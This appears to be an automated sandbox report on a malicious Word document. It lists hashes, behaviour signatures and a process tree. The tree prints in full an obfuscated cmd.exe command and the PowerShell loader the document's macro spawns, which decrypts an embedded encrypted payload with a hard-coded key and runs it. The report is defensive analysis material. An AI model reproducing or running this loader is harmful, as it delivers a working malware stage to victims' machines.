Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25-05-2024 18:43

General

  • Target

    72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc

  • Size

    195KB

  • MD5

    72e69b0bbd5fb4d0d83a7fe4fe8f1234

  • SHA1

    2ee022c7b7e85dce006c19a963fcdbae2b0c85da

  • SHA256

    5b9bce29afccc2b7c343b74f571061dd8c148a162849b1263913f549a5f14ce0

  • SHA512

    5634d571ecf9c1f67d05c4d3ec934b5970292fcc34765c99fe6d91f4270e09d9ae9becd9f4d661f19bcaa24c97cb1122eae852a483c2746c674732dd11d545c6

  • SSDEEP

    3072:cgn/iKFBaqCHonM8VIGNsmBGorUKqkr+1NPnjnw8WKzR:cg/iQBacxNsmBGo4dkruBnjw8

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3024
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" YHlNCRaMuFaDT iFHuAKCifprwwAmRsKw YzdoijvuUPa & %^C^o^m^S^p^E^c^% %^C^o^m^S^p^E^c^% /V /c set %zTOpZSzwuUrzNKL%=FmcpqXGKjQdocU&&set %JwmDJiiw%=p&&set %VVvAbUYhRzWLA%=o^w&&set %PbRZwIkZzuwSmlv%=SrZtnlthiZMDG&&set %TESkLfMR%=!%JwmDJiiw%!&&set %IoLUZEPfoOCPfoh%=XlUPuzmPihiik&&set %JQjTXiIwH%=e^r&&set %WfJPszLzNRcJXq%=!%VVvAbUYhRzWLA%!&&set %cTBUOhlq%=s&&set %uWvjToFnwMhjJic%=iHwLpHnroL&&set %iYnlXDfjwztpzJ%=he&&set %dndPGSiZOoY%=ll&&!%TESkLfMR%!!%WfJPszLzNRcJXq%!!%JQjTXiIwH%!!%cTBUOhlq%!!%iYnlXDfjwztpzJ%!!%dndPGSiZOoY%! " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('76492d1116743f0423413b16050a5345MgB8AGYAdwA3AEMAaQA1AE8AbQAyAEMAbAAzAFYAbwBMADYAQgBOAE4AQQA5AEEAPQA9AHwAMAA0ADEANQBkAGYANgA1AGEAOAAwADcAZgA2ADcAMAA4ADQANwAzAGQAYQBlAGYAMQBlADgAZABhADEAMQBjADcAZQBlADIAZAAwAGIAOQA2ADAAYwA2AGYAYgBhAGIANABhADEANQBlADcAZQA2AGIAZQAwAGUAOAAzADMAMwAyADQANwA5ADcAZQA3ADMAYwA3ADAAOAA3AGYAYgBlAGYANwBjADgAOAA4ADYAYQBhADEAYwBiADAAOQBkADUAYQAzADUAOAA2AGYAZgBmADQANQA4ADQAZgAxADEANwBjADAAMgBmAGQANgAxADUANQA4ADkAMgA4AGIAZAAzADgAZgAwAGUAZABiAGUAMwA4ADAANwBjAGUAMQAxADkANwA1ADAAMgAzAGUAMgAzADYAZgA0ADUANABlADMANQAzAGQAMgA1AGQANgA2ADkAYwAxAGMAMgA4ADUAYgAzADMAYwBjADkANAA0ADUANgA2AGQAMAAyADAAYgA5ADYAOABjAGIAYQAzAGIAMQA4ADYANQBjADYAZQA1ADkAMAA4AGUAOQAzAGUAOQAzAGEAMgA1AGMAZgAyAGIAMwA0ADUAOQA4ADAAYQAxADYAYwA2AGEAYQBmAGYANwA0ADkAZgA4AGIAMwBlADQAZQAwAGQAYQA4ADEAMgAyADQAMAAwADIANgAwAGQAYQA5AGIAMQBhADgAMAAwADMAZAAyAGMAYwA4ADUANgA2ADcAOQA2ADkAMQAzADEANQA0ADEANQA2AGUAZQBjAGIAZgBmADkAMwA2AGUAYwA5ADEAZgAzADYAZQA3ADYAOQBjAGIAMwA1ADAANwBiAGQANwA0ADIAYgA3AGEAYgBkADEAMgAyADkAOQBhAGEAYQBlAGUAMgA3ADEAZAA4AGMAZgA1ADQAMwAyADcAOQBkADIAMAA4ADMAOAAyADUAMwA2ADIANwA4ADEAZABmAGEAYgA5AGIAMwA3AGUAOABhAGIAMQA5AGUAMQBjADEAMAA3ADUAOABjADYAZgBmADUAZABmADEANwA4ADYAMQA2ADYAYQAwADMAZQBjAGUAZQA0ADMAOQA3AGQAZgAwADIAYwA1AGUAZAA5ADYAYgA1ADQANwAzADgANwA0ADQAYwAwADEANgA4ADEAOABmADgAMwBmAGQAYgAyAGEAZgAyAGUAZgA1ADQAYgA2ADYAZQA3ADEANwAyADIAMAAyADcAOQA2ADgAZABlADIAYwAzADEAYwBlADIANQAwAGYAOAA3AGIAZABiAGMAYgBhADkAYQAxADUANABiADIANwA1AGUAMgBlADUANAAyAGIANQAzADcANgBiAGUAMABmAGMAYgBhADAAMAA2ADYANgBlAGYAYgBjADEAMwBkADYANABkADkAYwA4ADIANgAxAGQANABiADYANgAxAGUAOAA5ADgAZgA5AGIAMQAxADEAMgAzAGEAZABiADIANwAwAGQANwA4ADgAMQA2ADYAYQBjAGIAYgAyADMANABkAGUAYwBlAGIAZQA2ADQAMwAyADgAYQAzADIANgA1AGYAOQBmADkAYQA5AGYANgA3AGUANABhADMAZQAyADEAMQA4ADIAMQA5AGIAZABhAGIAOQBkAGQANAAyAGEAOQBjADYAMwBhADcAYgA1ADYANAA2ADAAMAA0ADQAYgBmAGYAOABiAGYAMwBiAGQAYgA0AGUANQAyADcAZgBjADIANgA1AGIAMQBlADUAMAA0AGYANQA1ADEANgA0AGEAYgBjAGIAOAAxADYANgAwADUAYgAyADgAYgA3ADMAMABmADEAZQBiADIAOABiADgANAAxAGIAMQA5ADMAOQBjADYAYgAwAGQANQA4ADkAOQA2AGUAMABlADYAMQBmADAANQBlAGIAZQAzADAAMQAwADkAMQA2ADYAMABiAGUAOAA1AGIANwBmADUAMgAxAGYAYQBmAGUAMwA3AGUAZQAxAGEAMwA5ADUANQA5ADcAMABjAGQAYQBlADYAMQBiADMAOAA4ADgAZQA3ADYANgBkADMAYgA3ADgAOQA5AGQAMAAyAGEAZAA0ADcAMABjADUAZQBkADkAZAAzADEAZABiADkAMwAzADUAZAA1ADEANQAxADkAYwA0ADkAYwBhAGUAZABmADAAZQA2ADAANABlADUAOAA0ADQAMABhADgAMAA4AGIANgA3ADcAYwA3ADYAYQA4ADMAOQBmAGYANwAxADkAYgAzADMAYgA3ADcAMwA3ADEAMQAwADYAZgA0AGEAZgBlADUAYgBiAGIAYQBhADMAYQAyADEAMgBiADcAMwA5AGEAMwAwADMAOQA1AGUANQBiAGMAZQBhADgANgA1ADQAMABjAGUAMgA1AGEAZAA5ADYAYgBmAGUAYgA2AGIAZQBjADAAMAAwADMAOAAwADAANgBkAGMAMwAzAGMAMQA4ADUANgBjAGEANQBjADIAMAA3AGIAMgA5AGIAOQA0ADgAMQBhADQAMQBmADQANQBlAGQAOAA4ADEAZgBjAGMAMwA1ADAAMABhAGEAMgBjADAAYQBhADcANwA3ADEAYgAyADQAZAA3ADQANQAwAGIAMgA4AGEAYwAzAGEAMwBiADYANQBmADAANgBiAGEAYgA1ADUAMgA3AGQAZgA5ADYAYgBhADkAOAAwADMAMwBiADMAMQA0ADcAYgBmADYAYgA0AGMANAAzAGUAMAA4ADAANwA4AGIANQA4ADgAMQBiAGMAYgBhAGYAOABlAGUANwBhAGQAMAA4AGMANwA1ADcAMQBkADUAYgA2AGEAYgBmAGEAZgAwADAAZgBhAGYAMQBiADQAYQBiADAAZQAyAGQAZQA1AGEAMwA1ADcAMQA3ADUANwA2AGIAMgBiADgAYQAxAGEAMAAxADEAMwBkADUANwBmADEAOABmADQAYgAwADYANAAxADIAOABjADEAZAA4ADgAMgBhADcAMwBiADMAYgAxADAAMQA3ADgAZgA1ADgAZQBlADEAMAAwADkAYwA2ADQANAAxADUAOQBhADkAYwAzAGQAYgA4ADgAZQAzAGEAMQAxADcANgBiAGEAYQA3ADgAZQA4ADIANQAyAGQAZQAyADUANAA1ADYAMAA3ADgAMAA5ADYANwA3AGMAMABmADIAZABmAGUAYwA2ADIAMAA5AGYAYgAxADcANABjADgAYgBlAGUAYgAzAGQAMQA1AGIAZAAxADUANgA4ADcAMgA2ADYAMgA4AGEAOQBlADMAYgA3ADcAZQA3AGMAZQA0ADMANQAyADMANQAzADQAYgAxADcANQA1ADUAYwBiADAAOAA3ADQAOABmAGQAYgA0AGIANQBhADgAYwBhAGQAZgA0ADIAMQA1ADkAOABmADgAZgA2ADQAOAAyAGYAOQBjADUANwBhADUAYgBkAGQAMQA0ADQAMABhADEAYgA2ADgANwBkAGMANQAwADIAZABkADgAYgBlAGUAMQA2AGUANQA4AGUAYQA5ADkANQAwAGYAMQA0ADcAYgBkAGUAMAA2AGUANwBlADUAYQBmADcAYQA3AGMAYwBlADEANwA2ADIAZABiADEANQA1ADgAYwA1ADMAYQA0AGMAYgA2ADcANQAzADMANABmADkAZABiADIAYQA0ADMANAAxADkAZAA2ADgAMABkADUAMAA2AGUANwBhADcAYgA1ADgAMAAwADkANgAzADAAZgA1AGMAYwA2ADgANAA3ADUANQBmADkANABkADMANwBjAGUAOQAxADYAMQBmAGUAMABjAGMAYwA0ADUAZQBiADgAMgAxAGQAOQA2ADYAOQBmAGMAMQBmADAAMQA2AGUAZQBlAGUANwA2AGIAZgA4AGIAYgBjAGYAYwBjADAAYwA5ADIANAA4ADAAYgBiAGIAMABiADMAOQBkADAAOQAyAGMANQBjAGEAOABmAGUAYwBlADgANQAzADQANgBlAGYAYwBkAGMANAA0ADUAZgBjAGEAZQA5ADYAZQAwAGMAMwBjADgAOQAxADgAYQBlAGIANABmADkAMwAwADYANgA1AGEAOAA5AGUAMQA4ADgAZQAyAGIAZQBkADgAYgA0AGYAYgA5ADMANQBlADMAMAAzAGEAZgBlAGQAOABiADgAYwBmAGUAYgA5ADkAOABlADgAYgBkAA=='| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('76492d1116743f0423413b16050a5345MgB8AGYAdwA3AEMAaQA1AE8AbQAyAEMAbAAzAFYAbwBMADYAQgBOAE4AQQA5AEEAPQA9AHwAMAA0ADEANQBkAGYANgA1AGEAOAAwADcAZgA2ADcAMAA4ADQANwAzAGQAYQBlAGYAMQBlADgAZABhADEAMQBjADcAZQBlADIAZAAwAGIAOQA2ADAAYwA2AGYAYgBhAGIANABhADEANQBlADcAZQA2AGIAZQAwAGUAOAAzADMAMwAyADQANwA5ADcAZQA3ADMAYwA3ADAAOAA3AGYAYgBlAGYANwBjADgAOAA4ADYAYQBhADEAYwBiADAAOQBkADUAYQAzADUAOAA2AGYAZgBmADQANQA4ADQAZgAxADEANwBjADAAMgBmAGQANgAxADUANQA4ADkAMgA4AGIAZAAzADgAZgAwAGUAZABiAGUAMwA4ADAANwBjAGUAMQAxADkANwA1ADAAMgAzAGUAMgAzADYAZgA0ADUANABlADMANQAzAGQAMgA1AGQANgA2ADkAYwAxAGMAMgA4ADUAYgAzADMAYwBjADkANAA0ADUANgA2AGQAMAAyADAAYgA5ADYAOABjAGIAYQAzAGIAMQA4ADYANQBjADYAZQA1ADkAMAA4AGUAOQAzAGUAOQAzAGEAMgA1AGMAZgAyAGIAMwA0ADUAOQA4ADAAYQAxADYAYwA2AGEAYQBmAGYANwA0ADkAZgA4AGIAMwBlADQAZQAwAGQAYQA4ADEAMgAyADQAMAAwADIANgAwAGQAYQA5AGIAMQBhADgAMAAwADMAZAAyAGMAYwA4ADUANgA2ADcAOQA2ADkAMQAzADEANQA0ADEANQA2AGUAZQBjAGIAZgBmADkAMwA2AGUAYwA5ADEAZgAzADYAZQA3ADYAOQBjAGIAMwA1ADAANwBiAGQANwA0ADIAYgA3AGEAYgBkADEAMgAyADkAOQBhAGEAYQBlAGUAMgA3ADEAZAA4AGMAZgA1ADQAMwAyADcAOQBkADIAMAA4ADMAOAAyADUAMwA2ADIANwA4ADEAZABmAGEAYgA5AGIAMwA3AGUAOABhAGIAMQA5AGUAMQBjADEAMAA3ADUAOABjADYAZgBmADUAZABmADEANwA4ADYAMQA2ADYAYQAwADMAZQBjAGUAZQA0ADMAOQA3AGQAZgAwADIAYwA1AGUAZAA5ADYAYgA1ADQANwAzADgANwA0ADQAYwAwADEANgA4ADEAOABmADgAMwBmAGQAYgAyAGEAZgAyAGUAZgA1ADQAYgA2ADYAZQA3ADEANwAyADIAMAAyADcAOQA2ADgAZABlADIAYwAzADEAYwBlADIANQAwAGYAOAA3AGIAZABiAGMAYgBhADkAYQAxADUANABiADIANwA1AGUAMgBlADUANAAyAGIANQAzADcANgBiAGUAMABmAGMAYgBhADAAMAA2ADYANgBlAGYAYgBjADEAMwBkADYANABkADkAYwA4ADIANgAxAGQANABiADYANgAxAGUAOAA5ADgAZgA5AGIAMQAxADEAMgAzAGEAZABiADIANwAwAGQANwA4ADgAMQA2ADYAYQBjAGIAYgAyADMANABkAGUAYwBlAGIAZQA2ADQAMwAyADgAYQAzADIANgA1AGYAOQBmADkAYQA5AGYANgA3AGUANABhADMAZQAyADEAMQA4ADIAMQA5AGIAZABhAGIAOQBkAGQANAAyAGEAOQBjADYAMwBhADcAYgA1ADYANAA2ADAAMAA0ADQAYgBmAGYAOABiAGYAMwBiAGQAYgA0AGUANQAyADcAZgBjADIANgA1AGIAMQBlADUAMAA0AGYANQA1ADEANgA0AGEAYgBjAGIAOAAxADYANgAwADUAYgAyADgAYgA3ADMAMABmADEAZQBiADIAOABiADgANAAxAGIAMQA5ADMAOQBjADYAYgAwAGQANQA4ADkAOQA2AGUAMABlADYAMQBmADAANQBlAGIAZQAzADAAMQAwADkAMQA2ADYAMABiAGUAOAA1AGIANwBmADUAMgAxAGYAYQBmAGUAMwA3AGUAZQAxAGEAMwA5ADUANQA5ADcAMABjAGQAYQBlADYAMQBiADMAOAA4ADgAZQA3ADYANgBkADMAYgA3ADgAOQA5AGQAMAAyAGEAZAA0ADcAMABjADUAZQBkADkAZAAzADEAZABiADkAMwAzADUAZAA1ADEANQAxADkAYwA0ADkAYwBhAGUAZABmADAAZQA2ADAANABlADUAOAA0ADQAMABhADgAMAA4AGIANgA3ADcAYwA3ADYAYQA4ADMAOQBmAGYANwAxADkAYgAzADMAYgA3ADcAMwA3ADEAMQAwADYAZgA0AGEAZgBlADUAYgBiAGIAYQBhADMAYQAyADEAMgBiADcAMwA5AGEAMwAwADMAOQA1AGUANQBiAGMAZQBhADgANgA1ADQAMABjAGUAMgA1AGEAZAA5ADYAYgBmAGUAYgA2AGIAZQBjADAAMAAwADMAOAAwADAANgBkAGMAMwAzAGMAMQA4ADUANgBjAGEANQBjADIAMAA3AGIAMgA5AGIAOQA0ADgAMQBhADQAMQBmADQANQBlAGQAOAA4ADEAZgBjAGMAMwA1ADAAMABhAGEAMgBjADAAYQBhADcANwA3ADEAYgAyADQAZAA3ADQANQAwAGIAMgA4AGEAYwAzAGEAMwBiADYANQBmADAANgBiAGEAYgA1ADUAMgA3AGQAZgA5ADYAYgBhADkAOAAwADMAMwBiADMAMQA0ADcAYgBmADYAYgA0AGMANAAzAGUAMAA4ADAANwA4AGIANQA4ADgAMQBiAGMAYgBhAGYAOABlAGUANwBhAGQAMAA4AGMANwA1ADcAMQBkADUAYgA2AGEAYgBmAGEAZgAwADAAZgBhAGYAMQBiADQAYQBiADAAZQAyAGQAZQA1AGEAMwA1ADcAMQA3ADUANwA2AGIAMgBiADgAYQAxAGEAMAAxADEAMwBkADUANwBmADEAOABmADQAYgAwADYANAAxADIAOABjADEAZAA4ADgAMgBhADcAMwBiADMAYgAxADAAMQA3ADgAZgA1ADgAZQBlADEAMAAwADkAYwA2ADQANAAxADUAOQBhADkAYwAzAGQAYgA4ADgAZQAzAGEAMQAxADcANgBiAGEAYQA3ADgAZQA4ADIANQAyAGQAZQAyADUANAA1ADYAMAA3ADgAMAA5ADYANwA3AGMAMABmADIAZABmAGUAYwA2ADIAMAA5AGYAYgAxADcANABjADgAYgBlAGUAYgAzAGQAMQA1AGIAZAAxADUANgA4ADcAMgA2ADYAMgA4AGEAOQBlADMAYgA3ADcAZQA3AGMAZQA0ADMANQAyADMANQAzADQAYgAxADcANQA1ADUAYwBiADAAOAA3ADQAOABmAGQAYgA0AGIANQBhADgAYwBhAGQAZgA0ADIAMQA1ADkAOABmADgAZgA2ADQAOAAyAGYAOQBjADUANwBhADUAYgBkAGQAMQA0ADQAMABhADEAYgA2ADgANwBkAGMANQAwADIAZABkADgAYgBlAGUAMQA2AGUANQA4AGUAYQA5ADkANQAwAGYAMQA0ADcAYgBkAGUAMAA2AGUANwBlADUAYQBmADcAYQA3AGMAYwBlADEANwA2ADIAZABiADEANQA1ADgAYwA1ADMAYQA0AGMAYgA2ADcANQAzADMANABmADkAZABiADIAYQA0ADMANAAxADkAZAA2ADgAMABkADUAMAA2AGUANwBhADcAYgA1ADgAMAAwADkANgAzADAAZgA1AGMAYwA2ADgANAA3ADUANQBmADkANABkADMANwBjAGUAOQAxADYAMQBmAGUAMABjAGMAYwA0ADUAZQBiADgAMgAxAGQAOQA2ADYAOQBmAGMAMQBmADAAMQA2AGUAZQBlAGUANwA2AGIAZgA4AGIAYgBjAGYAYwBjADAAYwA5ADIANAA4ADAAYgBiAGIAMABiADMAOQBkADAAOQAyAGMANQBjAGEAOABmAGUAYwBlADgANQAzADQANgBlAGYAYwBkAGMANAA0ADUAZgBjAGEAZQA5ADYAZQAwAGMAMwBjADgAOQAxADgAYQBlAGIANABmADkAMwAwADYANgA1AGEAOAA5AGUAMQA4ADgAZQAyAGIAZQBkADgAYgA0AGYAYgA5ADMANQBlADMAMAAzAGEAZgBlAGQAOABiADgAYwBmAGUAYgA5ADkAOABlADgAYgBkAA=='| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2400

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      4ae41fc3b952c5c9de8ac18079474c3b

      SHA1

      a4675fcaf00e06c9ffc978eb236c51d8aff29726

      SHA256

      861309bb2a10dba145ab19e5dc42cdb0439567cc16e96ff8866db92a150b1932

      SHA512

      c6e3ff2fea327eff673750db7fc5354e91131ab26dc3ff597ed600c77ff5027c25e5c1c057b14cc08d33105cf03fcd0ef4a7c68280192627a5b89f0a41874eb9

    • memory/1544-24-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-18-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-8-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-21-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-25-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-0-0x000000002F611000-0x000000002F612000-memory.dmp

      Filesize

      4KB

    • memory/1544-22-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-2-0x000000007173D000-0x0000000071748000-memory.dmp

      Filesize

      44KB

    • memory/1544-26-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-36-0x000000007173D000-0x0000000071748000-memory.dmp

      Filesize

      44KB

    • memory/1544-37-0x00000000064C0000-0x00000000065C0000-memory.dmp

      Filesize

      1024KB

    • memory/1544-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1544-52-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1544-53-0x000000007173D000-0x0000000071748000-memory.dmp

      Filesize

      44KB